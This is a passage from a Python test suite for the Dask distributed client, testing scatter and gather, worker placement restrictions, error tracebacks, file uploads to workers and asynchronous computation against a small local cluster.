    """Data deleted behind the scheduler's back is recomputed on demand."""
    a.validate = False
    b.validate = False
    x = c.submit(inc, 1)
    y = c.submit(inc, x)
    z = c.submit(inc, y)
    await wait([x, y, z])
    # Secretly delete y's key
    if y.key in a.data:
        del a.data[y.key]
        a.release_key(y.key)
    if y.key in b.data:
        del b.data[y.key]
        b.release_key(y.key)
    await asyncio.sleep(0)
    w = c.submit(add, y, z)
    result = await w
    assert result == 3 + 4
@pytest.mark.skip
@gen_cluster(client=True)
async def test_gather_robust_to_missing_data(c, s, a, b):
    """gather() recomputes results whose data was deleted from workers."""
    a.validate = False
    b.validate = False
    x, y, z = c.map(inc, range(3))
    await wait([x, y, z])  # everything computed
    for f in [x, y]:
        for w in [a, b]:
            if f.key in w.data:
                del w.data[f.key]
                await asyncio.sleep(0)
                w.release_key(f.key)
    xx, yy, zz = await c.gather([x, y, z])
    assert (xx, yy, zz) == (1, 2, 3)
@pytest.mark.skip
@gen_cluster(client=True)
async def test_gather_robust_to_nested_missing_data(c, s, a, b):
    """gather() recomputes a chain of tasks whose tail data was deleted."""
    a.validate = False
    b.validate = False
    w = c.submit(inc, 1)
    x = c.submit(inc, w)
    y = c.submit(inc, x)
    z = c.submit(inc, y)
    await wait([z])
    for worker in [a, b]:
        for datum in [y, z]:
            if datum.key in worker.data:
                del worker.data[datum.key]
                await asyncio.sleep(0)
                worker.release_key(datum.key)
    result = await c.gather([z])
    assert result == [inc(inc(inc(inc(1))))]
@gen_cluster(client=True)
async def test_tokenize_on_futures(c, s, a, b):
    """tokenize() of a Future depends on its key, not its current state."""
    x = c.submit(inc, 1)
    y = c.submit(inc, 1)
    tok = tokenize(x)
    assert tokenize(x) == tokenize(x)
    assert tokenize(x) == tokenize(y)
    c.futures[x.key].finish()
    assert tok == tokenize(y)
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_restrictions_submit(c, s, a, b):
    """submit(workers={host}) records host restrictions and places data."""
    x = c.submit(inc, 1, workers={a.ip})
    y = c.submit(inc, x, workers={b.ip})
    await wait([x, y])
    assert s.host_restrictions[x.key] == {a.ip}
    assert x.key in a.data
    assert s.host_restrictions[y.key] == {b.ip}
    assert y.key in b.data
@gen_cluster(client=True)
async def test_restrictions_ip_port(c, s, a, b):
    """submit(workers={address}) records per-worker restrictions."""
    x = c.submit(inc, 1, workers={a.address})
    y = c.submit(inc, x, workers={b.address})
    await wait([x, y])
    assert s.worker_restrictions[x.key] == {a.address}
    assert x.key in a.data
    assert s.worker_restrictions[y.key] == {b.address}
    assert y.key in b.data
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_restrictions_map(c, s, a, b):
    """map(workers={host}) restricts every mapped task to that host."""
    L = c.map(inc, range(5), workers={a.ip})
    await wait(L)
    assert set(a.data) == {x.key for x in L}
    assert not b.data
    for x in L:
        assert s.host_restrictions[x.key] == {a.ip}
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_restrictions_get(c, s, a, b):
    """get(workers=host) restricts the whole graph to that host."""
    dsk = {"x": 1, "y": (inc, "x"), "z": (inc, "y")}
    futures = c.get(dsk, ["y", "z"], workers=a.ip, sync=False)
    result = await c.gather(futures)
    assert result == [2, 3]
    assert "y" in a.data
    assert "z" in a.data
    assert len(b.data) == 0
@gen_cluster(client=True)
async def test_restrictions_get_annotate(c, s, a, b):
    """dask.annotate(workers=...) pins individual keys to specific workers."""
    x = 1
    with dask.annotate(workers=a.address):
        y = delayed(inc)(x)
    with dask.annotate(workers=b.address):
        z = delayed(inc)(y)
    futures = c.get(z.__dask_graph__(), [y.key, z.key], sync=False)
    result = await c.gather(futures)
    assert result == [2, 3]
    assert y.key in a.data
    assert z.key in b.data
@gen_cluster(client=True)
async def dont_test_bad_restrictions_raise_exception(c, s, a, b):
    """Submitting to a nonexistent worker fails with an informative ValueError.

    (Prefixed dont_ so the test runner skips it; kept for reference.)
    """
    z = c.submit(inc, 2, workers={"bad-address"})
    # pytest.raises replaces the try/assert False/except boilerplate.
    with pytest.raises(ValueError) as excinfo:
        await z
    assert "bad-address" in str(excinfo.value)
    assert z.key in str(excinfo.value)
@gen_cluster(client=True)
async def test_remove_worker(c, s, a, b):
    """Results remain gatherable after one of the workers shuts down."""
    L = c.map(inc, range(20))
    await wait(L)
    await b.close()
    assert b.address not in s.workers
    result = await c.gather(L)
    assert result == list(map(inc, range(20)))
@gen_cluster(nthreads=[("127.0.0.1", 1)], client=True)
async def test_errors_dont_block(c, s, w):
    """Failing tasks do not prevent unrelated tasks from finishing."""
    L = [c.submit(inc, 1), c.submit(throws, 1), c.submit(inc, 2), c.submit(throws, 2)]
    while not (L[0].status == L[2].status == "finished"):
        await asyncio.sleep(0.01)
    result = await c.gather([L[0], L[2]])
    assert result == [2, 3]
@gen_cluster(client=True)
async def test_submit_quotes(c, s, a, b):
    """Lists (including lists of Futures) pass through submit() intact."""
    def assert_list(x, z=[]):
        return isinstance(x, list) and isinstance(z, list)

    x = c.submit(assert_list, [1, 2, 3])
    result = await x
    assert result
    x = c.submit(assert_list, [1, 2, 3], z=[4, 5, 6])
    result = await x
    assert result
    x = c.submit(inc, 1)
    y = c.submit(inc, 2)
    z = c.submit(assert_list, [x, y])
    result = await z
    assert result
@gen_cluster(client=True)
async def test_map_quotes(c, s, a, b):
    """List arguments pass through map() intact, positionally and by keyword."""
    def assert_list(x, z=[]):
        return isinstance(x, list) and isinstance(z, list)

    L = c.map(assert_list, [[1, 2, 3], [4]])
    result = await c.gather(L)
    assert all(result)
    L = c.map(assert_list, [[1, 2, 3], [4]], z=[10])
    result = await c.gather(L)
    assert all(result)
    L = c.map(assert_list, [[1, 2, 3], [4]], [[]] * 3)
    result = await c.gather(L)
    assert all(result)
@gen_cluster()
async def test_two_consecutive_clients_share_results(s, a, b):
    """Two clients submitting the same pure task share the cached result."""
    c = await Client(s.address, asynchronous=True)
    x = c.submit(random.randint, 0, 1000, pure=True)
    xx = await x
    f = await Client(s.address, asynchronous=True)
    y = f.submit(random.randint, 0, 1000, pure=True)
    yy = await y
    assert xx == yy
    await c.close()
    await f.close()
@gen_cluster(client=True)
async def test_submit_then_get_with_Future(c, s, a, b):
    """A Future may be embedded as a value inside a get() graph."""
    x = c.submit(slowinc, 1)
    dsk = {"y": (inc, x)}
    result = await c.get(dsk, "y", sync=False)
    assert result == 3
@gen_cluster(client=True)
async def test_aliases(c, s, a, b):
    """A graph key that aliases a Future resolves to the Future's value."""
    x = c.submit(inc, 1)
    dsk = {"y": x}
    result = await c.get(dsk, "y", sync=False)
    assert result == 2
@gen_cluster(client=True)
async def test_aliases_2(c, s, a, b):
    """Chained/aliased graph keys give the same results as local dask.get."""
    dsk_keys = [
        ({"x": (inc, 1), "y": "x", "z": "x", "w": (add, "y", "z")}, ["y", "w"]),
        ({"x": "y", "y": 1}, ["x"]),
        ({"x": 1, "y": "x", "z": "y", "w": (inc, "z")}, ["w"]),
    ]
    for dsk, keys in dsk_keys:
        result = await c.gather(c.get(dsk, keys, sync=False))
        assert list(result) == list(dask.get(dsk, keys))
        await asyncio.sleep(0)
@gen_cluster(client=True)
async def test_scatter(c, s, a, b):
    """scatter() places data on workers and returns gatherable Futures."""
    d = await c.scatter({"y": 20})
    assert isinstance(d["y"], Future)
    assert a.data.get("y") == 20 or b.data.get("y") == 20
    y_who_has = s.get_who_has(keys=["y"])["y"]
    assert a.address in y_who_has or b.address in y_who_has
    assert s.get_nbytes(summary=False) == {"y": sizeof(20)}
    yy = await c.gather([d["y"]])
    assert yy == [20]
    [x] = await c.scatter([10])
    assert isinstance(x, Future)
    assert a.data.get(x.key) == 10 or b.data.get(x.key) == 10
    xx = await c.gather([x])
    x_who_has = s.get_who_has(keys=[x.key])[x.key]
    assert s.tasks[x.key].who_has
    assert (
        s.workers[a.address] in s.tasks[x.key].who_has
        or s.workers[b.address] in s.tasks[x.key].who_has
    )
    assert s.get_nbytes(summary=False) == {"y": sizeof(20), x.key: sizeof(10)}
    assert xx == [10]
    z = c.submit(add, x, d["y"])  # submit works on Future
    result = await z
    assert result == 10 + 20
    result = await c.gather([z, x])
    assert result == [30, 10]
@gen_cluster(client=True)
async def test_scatter_types(c, s, a, b):
    """scatter() preserves the container type of its input."""
    d = await c.scatter({"x": 1})
    assert isinstance(d, dict)
    assert list(d) == ["x"]
    for seq in [[1], (1,), {1}, frozenset([1])]:
        L = await c.scatter(seq)
        assert isinstance(L, type(seq))
        assert len(L) == 1
        s.validate_state()
    seq = await c.scatter(range(5))
    assert isinstance(seq, list)
    assert len(seq) == 5
    s.validate_state()
@gen_cluster(client=True)
async def test_scatter_non_list(c, s, a, b):
    """Scattering a bare value returns a single Future, not a container."""
    x = await c.scatter(1)
    assert isinstance(x, Future)
    result = await x
    assert result == 1
@gen_cluster(client=True)
async def test_scatter_tokenize_local(c, s, a, b):
    """scatter() tokenizes locally, using registered normalize_token hooks."""
    from dask.base import normalize_token

    class MyObj:
        pass

    L = []

    @normalize_token.register(MyObj)
    def f(x):
        L.append(x)
        return "x"

    obj = MyObj()
    future = await c.scatter(obj)
    assert L and L[0] is obj
@gen_cluster(client=True)
async def test_scatter_singletons(c, s, a, b):
    """Scalars, numpy arrays, and DataFrames all round-trip through scatter."""
    np = pytest.importorskip("numpy")
    pd = pytest.importorskip("pandas")
    for x in [1, np.ones(5), pd.DataFrame({"x": [1, 2, 3]})]:
        future = await c.scatter(x)
        result = await future
        assert str(result) == str(x)
@gen_cluster(client=True)
async def test_scatter_typename(c, s, a, b):
    """Scattered futures get a key prefixed with the value's type name."""
    future = await c.scatter(123)
    assert future.key.startswith("int")
@gen_cluster(client=True)
async def test_scatter_hash(c, s, a, b):
    """Equal values scatter to the same key unless hash=False is given."""
    x = await c.scatter(123)
    y = await c.scatter(123)
    assert x.key == y.key
    z = await c.scatter(123, hash=False)
    assert z.key != y.key
@gen_cluster(client=True)
async def test_scatter_hash_2(c, s, a, b):
    """Scattering the same value twice in lists yields the same key."""
    [a] = await c.scatter([1])
    [b] = await c.scatter([1])
    assert a.key == b.key
    s.validate_state()
@gen_cluster(client=True)
async def test_get_releases_data(c, s, a, b):
    """Data computed via get() is released once no references remain."""
    await c.gather(c.get({"x": (inc, 1)}, ["x"], sync=False))
    # gc is already imported at module scope; the local import was redundant.
    gc.collect()
    while c.refcount["x"]:
        await asyncio.sleep(0.01)
def test_current(s, a, b):
    """Client.current() tracks the active client; raises when there is none."""
    with Client(s["address"]) as c:
        assert Client.current() is c
    with pytest.raises(ValueError):
        Client.current()
    with Client(s["address"]) as c:
        assert Client.current() is c
def test_global_clients(loop):
    """The most recently created client becomes the default/global client."""
    assert _get_global_client() is None
    with pytest.raises(ValueError):
        default_client()
    with cluster() as (s, [a, b]):
        with Client(s["address"], loop=loop) as c:
            assert _get_global_client() is c
            assert default_client() is c
            with Client(s["address"], loop=loop) as f:
                assert _get_global_client() is f
                assert default_client() is f
                assert default_client(c) is c
                assert default_client(f) is f
    assert _get_global_client() is None
@gen_cluster(client=True)
async def test_exception_on_exception(c, s, a, b):
    """Exceptions propagate transitively through dependent futures."""
    x = c.submit(lambda: 1 / 0)
    y = c.submit(inc, x)
    with pytest.raises(ZeroDivisionError):
        await y
    z = c.submit(inc, y)
    with pytest.raises(ZeroDivisionError):
        await z
@gen_cluster(client=True)
async def test_get_nbytes(c, s, a, b):
    """Scheduler.get_nbytes(summary=False) reports per-key byte sizes."""
    [x] = await c.scatter([1])
    assert s.get_nbytes(summary=False) == {x.key: sizeof(1)}
    y = c.submit(inc, x)
    await y
    assert s.get_nbytes(summary=False) == {x.key: sizeof(1), y.key: sizeof(2)}
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_nbytes_determines_worker(c, s, a, b):
    """A task depending on one small and one large input runs where the large input lives."""
    x = c.submit(identity, 1, workers=[a.ip])
    y = c.submit(identity, tuple(range(100)), workers=[b.ip])
    await c.gather([x, y])
    z = c.submit(lambda x, y: None, x, y)
    await z
    # z should have been scheduled on b, next to the larger dependency y
    assert s.tasks[z.key].who_has == {s.workers[b.address]}
@gen_cluster(client=True)
async def test_if_intermediates_clear_on_error(c, s, a, b):
    """When a computation errors, intermediate results are released from workers."""
    x = delayed(div, pure=True)(1, 0)
    y = delayed(div, pure=True)(1, 2)
    z = delayed(add, pure=True)(x, y)
    f = c.compute(z)
    with pytest.raises(ZeroDivisionError):
        await f
    s.validate_state()
    # No task should still hold data after the failure
    assert not any(ts.who_has for ts in s.tasks.values())
@gen_cluster(
    client=True, config={"distributed.scheduler.default-task-durations": {"f": "1ms"}}
)
async def test_pragmatic_move_small_data_to_large_data(c, s, a, b):
    """The scheduler moves small data (total) to large data (lists), not vice versa."""
    np = pytest.importorskip("numpy")
    lists = c.map(np.ones, [10000] * 10, pure=False)
    sums = c.map(np.sum, lists)
    total = c.submit(sum, sums)
    def f(x, y):
        return None
    results = c.map(f, lists, [total] * 10)
    await wait([total])
    await wait(results)
    # Most result tasks should run on the worker already holding the big list;
    # allow one miss for scheduling slack.
    assert (
        sum(
            s.tasks[r.key].who_has.issubset(s.tasks[l.key].who_has)
            for l, r in zip(lists, results)
        )
        >= 9
    )
@gen_cluster(client=True)
async def test_get_with_non_list_key(c, s, a, b):
    """Client.get accepts single tuple or scalar keys, not just lists."""
    dsk = {("x", 0): (inc, 1), 5: (inc, 2)}
    x = await c.get(dsk, ("x", 0), sync=False)
    y = await c.get(dsk, 5, sync=False)
    assert x == 2
    assert y == 3
@gen_cluster(client=True)
async def test_get_with_error(c, s, a, b):
    """An error in an upstream task surfaces from the async Client.get."""
    dsk = {"x": (div, 1, 0), "y": (inc, "x")}
    with pytest.raises(ZeroDivisionError):
        await c.get(dsk, "y", sync=False)
def test_get_with_error_sync(c):
    """An error in an upstream task surfaces from the synchronous Client.get."""
    dsk = {"x": (div, 1, 0), "y": (inc, "x")}
    with pytest.raises(ZeroDivisionError):
        c.get(dsk, "y")
@gen_cluster(client=True)
async def test_directed_scatter(c, s, a, b):
    """Scatter honors worker targets given by address or by worker name."""
    await c.scatter([1, 2, 3], workers=[a.address])
    assert len(a.data) == 3
    assert not b.data
    await c.scatter([4, 5], workers=[b.name])
    assert len(b.data) == 2
def test_directed_scatter_sync(c, s, a, b, loop):
    """Synchronous scatter with a workers= target places data only there."""
    futures = c.scatter([1, 2, 3], workers=[b["address"]])
    has_what = sync(loop, c.scheduler.has_what)
    assert len(has_what[b["address"]]) == len(futures)
    assert len(has_what[a["address"]]) == 0
@gen_cluster(client=True)
async def test_scatter_direct(c, s, a, b):
    """direct=True scatter/gather bypasses the scheduler's data channel."""
    future = await c.scatter(123, direct=True)
    assert future.key in a.data or future.key in b.data
    assert s.tasks[future.key].who_has
    assert future.status == "finished"
    result = await future
    assert result == 123
    # Scheduler should not have handled any scatter ops itself
    assert not s.counters["op"].components[0]["scatter"]
    result = await future
    assert not s.counters["op"].components[0]["gather"]
    result = await c.gather(future)
    assert not s.counters["op"].components[0]["gather"]
@gen_cluster()
async def test_scatter_direct_2(s, a, b):
    """A client with a short heartbeat updates its last_seen on the scheduler."""
    c = await Client(s.address, asynchronous=True, heartbeat_interval=10)
    last = s.clients[c.id].last_seen
    while s.clients[c.id].last_seen == last:
        await asyncio.sleep(0.10)
    await c.close()
@gen_cluster(client=True)
async def test_scatter_direct_numpy(c, s, a, b):
    """direct=True scatter round-trips a numpy array without scheduler involvement."""
    np = pytest.importorskip("numpy")
    x = np.ones(5)
    future = await c.scatter(x, direct=True)
    result = await future
    assert np.allclose(x, result)
    assert not s.counters["op"].components[0]["scatter"]
@gen_cluster(client=True)
async def test_scatter_direct_broadcast(c, s, a, b):
    """direct=True + broadcast=True places the value on every worker."""
    future2 = await c.scatter(456, direct=True, broadcast=True)
    assert future2.key in a.data
    assert future2.key in b.data
    assert s.tasks[future2.key].who_has == {s.workers[a.address], s.workers[b.address]}
    result = await future2
    assert result == 456
    assert not s.counters["op"].components[0]["scatter"]
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_scatter_direct_balanced(c, s, *workers):
    """direct=True scatter of three values spreads them over three of four workers."""
    futures = await c.scatter([1, 2, 3], direct=True)
    assert sorted(len(w.data) for w in workers) == [0, 1, 1, 1]
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_scatter_direct_broadcast_target(c, s, *workers):
    """direct scatter respects a workers= target, with and without broadcast."""
    futures = await c.scatter([123, 456], direct=True, workers=workers[0].address)
    assert futures[0].key in workers[0].data
    assert futures[1].key in workers[0].data
    futures = await c.scatter(
        [123, 456],
        direct=True,
        broadcast=True,
        workers=[w.address for w in workers[:3]],
    )
    # NOTE(review): this asserts a generator object, which is always truthy —
    # the per-future/per-worker conditions inside are never evaluated; confirm intent.
    assert (
        f.key in w.data and w.address in s.tasks[f.key].who_has
        for f in futures
        for w in workers[:3]
    )
@gen_cluster(client=True, nthreads=[])
async def test_scatter_direct_empty(c, s):
    """direct scatter with no workers available fails within the timeout."""
    with pytest.raises((ValueError, TimeoutError)):
        await c.scatter(123, direct=True, timeout=0.1)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 5)
async def test_scatter_direct_spread_evenly(c, s, *workers):
    """Repeated direct scatters eventually reach every worker."""
    futures = []
    for i in range(10):
        future = await c.scatter(i, direct=True)
        futures.append(future)
    assert all(w.data for w in workers)
@pytest.mark.parametrize("direct", [True, False])
@pytest.mark.parametrize("broadcast", [True, False])
def test_scatter_gather_sync(c, direct, broadcast):
    """Sync scatter/gather round-trips for all direct/broadcast combinations."""
    futures = c.scatter([1, 2, 3], direct=direct, broadcast=broadcast)
    results = c.gather(futures, direct=direct)
    assert results == [1, 2, 3]
    delayed(inc)(1).compute(direct=direct)
@gen_cluster(client=True)
async def test_gather_direct(c, s, a, b):
    """gather(direct=True) retrieves scattered data straight from workers."""
    futures = await c.scatter([1, 2, 3])
    data = await c.gather(futures, direct=True)
    assert data == [1, 2, 3]
@gen_cluster(client=True)
async def test_many_submits_spread_evenly(c, s, a, b):
    """Ten submitted tasks end up distributed across both workers."""
    L = [c.submit(inc, i) for i in range(10)]
    await wait(L)
    assert a.data and b.data
@gen_cluster(client=True)
async def test_traceback(c, s, a, b):
    """Future.traceback() returns the remote traceback including the failing line."""
    x = c.submit(div, 1, 0)
    tb = await x.traceback()
    assert any("x / y" in line for line in pluck(3, traceback.extract_tb(tb)))
@gen_cluster(client=True)
async def test_get_traceback(c, s, a, b):
    """Exceptions raised via Client.get carry the remote traceback."""
    try:
        await c.get({"x": (div, 1, 0)}, "x", sync=False)
    except ZeroDivisionError:
        exc_type, exc_value, exc_traceback = sys.exc_info()
        L = traceback.format_tb(exc_traceback)
        assert any("x / y" in line for line in L)
@gen_cluster(client=True)
async def test_gather_traceback(c, s, a, b):
    """Exceptions raised via Client.gather carry the remote traceback."""
    x = c.submit(div, 1, 0)
    try:
        await c.gather(x)
    except ZeroDivisionError:
        exc_type, exc_value, exc_traceback = sys.exc_info()
        L = traceback.format_tb(exc_traceback)
        assert any("x / y" in line for line in L)
def test_traceback_sync(c):
    """Sync Future.traceback(): errors yield tracebacks, dependents include them, successes yield None."""
    x = c.submit(div, 1, 0)
    tb = x.traceback()
    assert any(
        "x / y" in line
        for line in concat(traceback.extract_tb(tb))
        if isinstance(line, str)
    )
    y = c.submit(inc, x)
    tb2 = y.traceback()
    # y's traceback contains everything from x's traceback
    assert set(pluck(3, traceback.extract_tb(tb2))).issuperset(
        set(pluck(3, traceback.extract_tb(tb)))
    )
    z = c.submit(div, 1, 2)
    tb = z.traceback()
    assert tb is None
@gen_cluster(client=True)
async def test_upload_file(c, s, a, b):
    """upload_file ships a module to workers and re-uploading replaces it."""
    def g():
        import myfile
        return myfile.f()
    with save_sys_modules():
        for value in [123, 456]:
            with tmp_text("myfile.py", f"def f():\n    return {value}") as fn:
                await c.upload_file(fn)
                x = c.submit(g, pure=False)
                result = await x
                assert result == value
@gen_cluster(client=True)
async def test_upload_file_refresh_delayed(c, s, a, b):
    """A delayed computation built from an uploaded module sees the latest upload."""
    with save_sys_modules():
        for value in [123, 456]:
            with tmp_text("myfile.py", f"def f():\n    return {value}") as fn:
                await c.upload_file(fn)
                sys.path.append(os.path.dirname(fn))
                from myfile import f
                b = delayed(f)()
                bb = c.compute(b, sync=False)
                result = await c.gather(bb)
                assert result == value
@gen_cluster(client=True)
async def test_upload_file_no_extension(c, s, a, b):
    """Uploading a file with no extension does not error."""
    with tmp_text("myfile", "") as fn:
        await c.upload_file(fn)
@gen_cluster(client=True)
async def test_upload_file_zip(c, s, a, b):
    """upload_file accepts zip archives; modules inside become importable on workers."""
    def g():
        import myfile
        return myfile.f()
    with save_sys_modules():
        try:
            for value in [123, 456]:
                with tmp_text(
                    "myfile.py", f"def f():\n    return {value}"
                ) as fn_my_file:
                    with zipfile.ZipFile("myfile.zip", "w") as z:
                        z.write(fn_my_file, arcname=os.path.basename(fn_my_file))
                    await c.upload_file("myfile.zip")
                    x = c.submit(g, pure=False)
                    result = await x
                    assert result == value
        finally:
            # Clean up the archive created in the current working directory
            if os.path.exists("myfile.zip"):
                os.remove("myfile.zip")
@gen_cluster(client=True)
async def test_upload_file_egg(c, s, a, b):
    """upload_file accepts .egg archives; all contained packages become importable."""
    def g():
        import package_1
        import package_2
        return package_1.a, package_2.b
    # c.upload_file tells each worker to
    # - put this file in their local_directory
    # - modify their sys.path to include it
    # we don't care about the local_directory
    # but we do care about restoring the path
    with save_sys_modules():
        for value in [123, 456]:
            with tmpfile() as dirname:
                os.mkdir(dirname)
                with open(os.path.join(dirname, "setup.py"), "w") as f:
                    f.write("from setuptools import setup, find_packages\n")
                    f.write(
                        'setup(name="my_package", packages=find_packages(), version="{}")\n'.format(
                            value
                        )
                    )
                # test a package with an underscore in the name
                package_1 = os.path.join(dirname, "package_1")
                os.mkdir(package_1)
                with open(os.path.join(package_1, "__init__.py"), "w") as f:
                    f.write(f"a = {value}\n")
                # test multiple top-level packages
                package_2 = os.path.join(dirname, "package_2")
                os.mkdir(package_2)
                with open(os.path.join(package_2, "__init__.py"), "w") as f:
                    f.write(f"b = {value}\n")
                # compile these into an egg
                subprocess.check_call(
                    [sys.executable, "setup.py", "bdist_egg"], cwd=dirname
                )
                egg_root = os.path.join(dirname, "dist")
                # first file ending with '.egg'
                egg_name = [
                    fname for fname in os.listdir(egg_root) if fname.endswith(".egg")
                ][0]
                egg_path = os.path.join(egg_root, egg_name)
                await c.upload_file(egg_path)
                os.remove(egg_path)
                x = c.submit(g, pure=False)
                result = await x
                assert result == (value, value)
@gen_cluster(client=True)
async def test_upload_large_file(c, s, a, b):
    """_upload_large_file places files in each worker's local_directory, honoring remote_filename."""
    assert a.local_directory
    assert b.local_directory
    with tmp_text("myfile", "abc") as fn:
        with tmp_text("myfile2", "def") as fn2:
            await c._upload_large_file(fn, remote_filename="x")
            await c._upload_large_file(fn2)
            for w in [a, b]:
                assert os.path.exists(os.path.join(w.local_directory, "x"))
                assert os.path.exists(os.path.join(w.local_directory, "myfile2"))
                with open(os.path.join(w.local_directory, "x")) as f:
                    assert f.read() == "abc"
                with open(os.path.join(w.local_directory, "myfile2")) as f:
                    assert f.read() == "def"
def test_upload_file_sync(c):
    """Synchronous upload_file makes the module importable in submitted tasks."""
    def g():
        import myfile
        return myfile.x
    with tmp_text("myfile.py", "x = 123") as fn:
        c.upload_file(fn)
        x = c.submit(g)
        assert x.result() == 123
@gen_cluster(client=True)
async def test_upload_file_exception(c, s, a, b):
    """Uploading a file with invalid Python raises SyntaxError to the caller."""
    with tmp_text("myfile.py", "syntax-error!") as fn:
        with pytest.raises(SyntaxError):
            await c.upload_file(fn)
def test_upload_file_exception_sync(c):
    """Synchronous variant: an invalid module upload raises SyntaxError."""
    with tmp_text("myfile.py", "syntax-error!") as fn:
        with pytest.raises(SyntaxError):
            c.upload_file(fn)
@gen_cluster(client=True, nthreads=[])
async def test_upload_file_new_worker(c, s):
    """A worker joining after upload_file still receives the uploaded module."""
    def g():
        import myfile
        return myfile.x
    with tmp_text("myfile.py", "x = 123") as fn:
        await c.upload_file(fn)
        async with Worker(s.address):
            x = await c.submit(g)
    assert x == 123
@pytest.mark.skip
@gen_cluster()
async def test_multiple_clients(s, a, b):
    """Two clients on one scheduler keep futures bound to their owning client."""
    a = await Client(s.address, asynchronous=True)
    b = await Client(s.address, asynchronous=True)
    x = a.submit(inc, 1)
    y = b.submit(inc, 2)
    assert x.client is a
    assert y.client is b
    xx = await x
    yy = await y
    assert xx == 2
    assert yy == 3
    # Combining futures from different clients: result belongs to the submitter
    z = a.submit(add, x, y)
    assert z.client is a
    zz = await z
    assert zz == 5
    await a.close()
    await b.close()
@gen_cluster(client=True)
async def test_async_compute(c, s, a, b):
    """Client.compute on delayed objects returns Futures; plain values pass through."""
    from dask.delayed import delayed
    x = delayed(1)
    y = delayed(inc)(x)
    z = delayed(dec)(x)
    [yy, zz, aa] = c.compute([y, z, 3], sync=False)
    assert isinstance(yy, Future)
    assert isinstance(zz, Future)
    assert aa == 3
    result = await c.gather([yy, zz])
    assert result == [2, 0]
    # Scalar input -> single Future; list input -> list/tuple of Futures
    assert isinstance(c.compute(y), Future)
    assert isinstance(c.compute([y]), (tuple, list))
@gen_cluster(client=True)
async def test_async_compute_with_scatter(c, s, a, b):
    """Delayed graphs can consume futures produced by a dict scatter."""
    d = await c.scatter({("x", 1): 1, ("y", 1): 2})
    x, y = d[("x", 1)], d[("y", 1)]
    from dask.delayed import delayed
    z = delayed(add)(delayed(inc)(x), delayed(inc)(y))
    zz = c.compute(z)
    [result] = await c.gather([zz])
    assert result == 2 + 3
def test_sync_compute(c):
    """Client.compute(sync=True) returns concrete results, not Futures."""
    x = delayed(1)
    y = delayed(inc)(x)
    z = delayed(dec)(x)
    yy, zz = c.compute([y, z], sync=True)
    assert (yy, zz) == (2, 0)
@gen_cluster(client=True)
async def test_remote_scatter_gather(c, s, a, b):
    """Scattered values land on some worker and gather back unchanged."""
    x, y, z = await c.scatter([1, 2, 3])
    assert x.key in a.data or x.key in b.data
    assert y.key in a.data or y.key in b.data
    assert z.key in a.data or z.key in b.data
    xx, yy, zz = await c.gather([x, y, z])
    assert (xx, yy, zz) == (1, 2, 3)
@gen_cluster(client=True)
async def test_remote_submit_on_Future(c, s, a, b):
    """A Future can be passed as an argument to a later submit."""
    x = c.submit(lambda x: x + 1, 1)
    y = c.submit(lambda x: x + 1, x)
    result = await y
    assert result == 3
def test_start_is_idempotent(c):
    """Calling Client.start repeatedly is harmless."""
    c.start()
    c.start()
    c.start()
    x = c.submit(inc, 1)
    assert x.result() == 2
@gen_cluster(client=True)
async def test_client_with_scheduler(c, s, a, b):
    """End-to-end smoke test of submit, scatter, gather, and get against a scheduler."""
    assert s.nthreads == {a.address: a.nthreads, b.address: b.nthreads}
    x = c.submit(inc, 1)
    y = c.submit(inc, 2)
    z = c.submit(add, x, y)
    result = await x
    assert result == 1 + 1
    result = await z
    assert result == 1 + 1 + 1 + 2
    A, B, C = await c.scatter([1, 2, 3])
    AA, BB, xx = await c.gather([A, B, x])
    assert (AA, BB, xx) == (1, 2, 2)
    result = await c.get({"x": (inc, 1), "y": (add, "x", 10)}, "y", sync=False)
    assert result == 12
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_allow_restrictions(c, s, a, b):
    """Worker restrictions with allow_other_workers=True are recorded as loose.

    Covers: strict restriction to a worker, loose restrictions for submit/map,
    loose restrictions to an unreachable host (task still runs elsewhere), and
    validation errors for bad ``allow_other_workers`` arguments.
    """
    aws = s.workers[a.address]
    # Fixed: was s.workers[a.address], duplicating aws instead of pointing at b.
    bws = s.workers[b.address]
    # Strict restriction: runs on a, not recorded as loose
    x = c.submit(inc, 1, workers=a.ip)
    await x
    assert s.tasks[x.key].who_has == {aws}
    assert not s.loose_restrictions
    # Loose restriction: still prefers a, but key is recorded as loose
    x = c.submit(inc, 2, workers=a.ip, allow_other_workers=True)
    await x
    assert s.tasks[x.key].who_has == {aws}
    assert x.key in s.loose_restrictions
    L = c.map(inc, range(3, 13), workers=a.ip, allow_other_workers=True)
    await wait(L)
    assert all(s.tasks[f.key].who_has == {aws} for f in L)
    assert {f.key for f in L}.issubset(s.loose_restrictions)
    # Loose restriction to a non-existent host: task still completes somewhere
    x = c.submit(inc, 15, workers="127.0.0.3", allow_other_workers=True)
    await x
    assert s.tasks[x.key].who_has
    assert x.key in s.loose_restrictions
    L = c.map(inc, range(15, 25), workers="127.0.0.3", allow_other_workers=True)
    await wait(L)
    assert all(s.tasks[f.key].who_has for f in L)
    assert {f.key for f in L}.issubset(s.loose_restrictions)
    # allow_other_workers without workers= is invalid
    with pytest.raises(ValueError):
        c.submit(inc, 1, allow_other_workers=True)
    with pytest.raises(ValueError):
        c.map(inc, [1], allow_other_workers=True)
    # allow_other_workers must be a bool
    with pytest.raises(TypeError):
        c.submit(inc, 20, workers="127.0.0.1", allow_other_workers="Hello!")
    with pytest.raises(TypeError):
        c.map(inc, [20], workers="127.0.0.1", allow_other_workers="Hello!")
def test_bad_address():
    """Connecting to an unreachable scheduler raises OSError mentioning 'connect'."""
    with pytest.raises(OSError, match="connect"):
        Client("123.123.123.123:1234", timeout=0.1)
